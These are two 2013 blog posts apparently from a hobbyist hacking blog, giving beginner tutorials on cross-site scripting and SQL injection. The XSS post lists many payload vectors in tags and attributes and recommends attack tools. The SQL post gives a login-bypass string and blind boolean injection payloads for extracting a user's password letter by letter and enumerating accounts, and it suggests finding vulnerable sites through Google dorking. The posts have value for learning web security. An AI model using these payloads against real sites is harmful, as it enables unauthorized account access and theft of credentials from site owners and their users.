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Monday, 19 August 2013

XSS Unleashed

XSS Attack
XSS: XSS stands for Cross Site Scripting.

XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Trust me thousands of website are at risk of this attack. In earlier day I have seen this vulnerability in many popular website like Rediff, Yahoo,Adobe Flash Player, even MI5 website. yahoo still has one great flaw in XSS, If you able to use it you can have access to any Yahoo user account(Unethical though).Don't ask me how to (Be ethical always), To know just google Yahoo DOM XSS
Before You Start:
1.Learn some basic of website scripting.
2.If you are an web developer, make sure you test your site/application before going live.Don't ignore the power of XSS.
3.Try to understand the terms used in this article(In case you are a novice)
4. To get deep into it get trained. 
5. If you are just a Internet User don't fool yourself by thinking if you don't click on any link you will be protected from XSS.  

XSS Attack Vectors:

So how does a hacker infect your web page in the first place? You might think, that for an attacker to make changes to your web page he must first break the security of the web server and be able to upload and modify files on that server. Unfortunately for you an XSS attack is much easier than that.

Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behavior. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

By now you should be aware that any sort of data that can land on your web page from an external source has the potential of being infected with a malicious script, but in what form does the data come?


The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:

External script:


Embedded script:

<SCRIPT> alert(“XSS”); </SCRIPT>


The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>

The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">


Some browsers will execute a script when found in the <IMG> tag as shown here:

<IMG SRC="javascript:alert('XSS');">

There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">


The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.



If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


The <LINK> tag, which is often used to link to external style sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">


The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">

The same applies to the <TD> tag, used to separate cells inside a table:

<TD BACKGROUND="javascript:alert('XSS')">


The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

The <DIV> STYLE attribute can also be manipulated in the following way:

<DIV STYLE="width: expression(alert('XSS'));">


The <OBJECT> tag can be used to pull in a script from an external site in the following way:

<OBJECT TYPE="text/x-scriptlet" DATA="">


If the hacker places a malicious script inside a flash file, it can be injected in the following way:

<EMBED SRC="" AllowScriptAccess="always">

Testing if a Site is exposed to XSS:
A simple test to see if your website is vulnerable to a cross-site scripting attack is to enter the following code snippet into a form field and submit the form:

<script>alert("Vulnerable to XSS");</script>

If an alert window pops up with the "Vulnerable to XSS" message when the form data is processed and displayed, then the application accepts tags and is at risk because the input data has not been validated either before being processed or being published.
here are three known types of cross site scripting: reflected, stored, and DOM injection. Reflected XSS is the easiest to exploit – a page will reflect user supplied data directly back to the user:

echo $_REQUEST['userinput'];

Stored XSS takes hostile data, stores it in a file, a database, or other back end system, and then at a later stage, displays the data to the user, unfiltered. This is extremely dangerous in systems such as CMS, blogs, or forums, where a large number of users will see input from other individuals.

With DOM based XSS attacks, the site’s JavaScript code and variables are manipulated rather than HTML elements. Alternatively, attacks can be a blend or hybrid of all three types. The danger with cross site scripting is not the type of attack, but that it is possible.

Attacks are usually implemented in JavaScript, which is a powerful scripting language. Using JavaScript allows attackers to manipulate any aspect of the rendered page, including adding new elements (such as adding a login tile which forwards credentials to a hostile site), manipulating any aspect of the internal DOM tree, and deleting or changing the way the page looks and feels. JavaScript allows the use of XmlHttpRequest, which is typically used by sites using AJAX technologies, even if victim site does not use AJAX today.


1.Acunetix Web Vulnerability Scanner (testing tool)
2. XSSer (Attack tool with GUI Interface, My fav)
3. XSS-proxy (Powerfull & Customizable, Command line tool) 

    Get your hand dirty with these tool & play fair.Let me know any query you have after reading this article(I'm sure you have a lottt)

Tuesday, 13 August 2013

A beginner guide to Sql Injection

 SQL Injection
SQL injection is currently the most common form of web site attack in that web forms are very common, often they are not coded properly and the hacking tools used to find weaknesses and take advantage of them are commonly available online. This kind of exploit is easy enough to accomplish that even inexperienced hackers can accomplish mischief. However, in the hands of the very skilled hacker, a web code weakness can reveal root level access of web servers and from there attacks on other networked servers can be accomplished.

Structured Query Language (SQL) is the nearly universal language of databases that allows the storage, manipulation, and retrieval of data. Databases that use SQL include MS SQL Server, MySQL, Oracle, Access and Filemaker Pro and these databases are equally subject to SQL injection attack.

Web based forms must allow some access to your database to allow entry of data and a response, so this kind of attack bypasses firewalls and endpoint defenses. Any web form, even a simple logon form or search box, might provide access to your data by means of SQL injection if coded incorrectly. 

Take A Note Before Start:
1. Just reading this article will not enough to be master of it.
2. Trying these on any website is unethical & offensive too in many country.
3. Make your hand & mind dirty with SQL syntax before going deep into powerful aspect of this method.
4. Learn to find Vulnerable Site using google. Trust me "Google Hacking Database" will teach you amazing secret of Google.
5. Trust in yourself,Don't allow failure to Stop you.Good Luck  
How to Identify a Site Vulnerable to an SQL Injection Attack:If a web page accepts text entry (for example a user name and password) then try entering a string that contains one single quote
A vulnerable site may behave oddly & give lengthy error message.

Fingerprinting the Database

Even the SQL language is a standard, every DBMS has its peculiarity and differs from each other in many aspects like special commands, functions to retrieve data such as users names and databases, features, comments line etc.
When the testers move to a more advanced SQL injection exploitation they need to know the backend.

The first way to find out which is the backend is by observing the error returned by the application. Follow are some examples:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1
ORA-00933: SQL command not properly ended
MS SQL Server:
Microsoft SQL Native Client error ‘80040e14’
Unclosed quotation mark after the character string
Query failed: ERROR: syntax error at or near
"’" at character 56 in /www/site/test.php on line 121.
To gain access and find a user name:
Enter the string  'OR''='  as both user name and password in the login page. This should get you logged in as a user (it happens to be the first user in the table).It will work if that site is programmed by a novice.
Say you login as "antony". But you will not able to know the password. Don't worry... Read next few line, You can see it also possible.
As you should have gained access as "antony" however you still do not know antony's password. You can now find this out using a little trial and error. Before you continue try taking a guess at antony's password by entering antony as user name and your best guess at his password.
Work out antony's password:
You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a valid SQL query. In each case use a xx for the user name and the text shown as password. You can ask questions such as:
Does antony's password have a w in it?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%') AND ''='
Does antony's password start with w?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE 'w%') AND ''='
Does antony's password have an w followed by d?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%d%') AND ''='
Is the fourth letter of antony's password w?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '___w%') AND ''='

This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
Find a user names using SQL Injection:

You can find other users on the system. We choose to get antony's password simply because he was the first in the list but there may be others.
You can still only ask yes/no questions, but you can find out just about anything you want to with a little patience.
Again you use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
    ' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
    ' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
Is there a user (other than jake) with an a in his name?
    ' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='

Tools(Click to Download & Try):
1. Havij SQL Injection

2. Pangolin   (Link contain supported download also)
3. The Mole   

4. SQLNinja  (Inbuilt in Backtrack 5)   (Linux Version)
5. Safe3SI    

6. BSQL Hacker (good one, More compitablity)    Link:
7. Sqlmap (My Fav, Little hazy but work fine when used properly)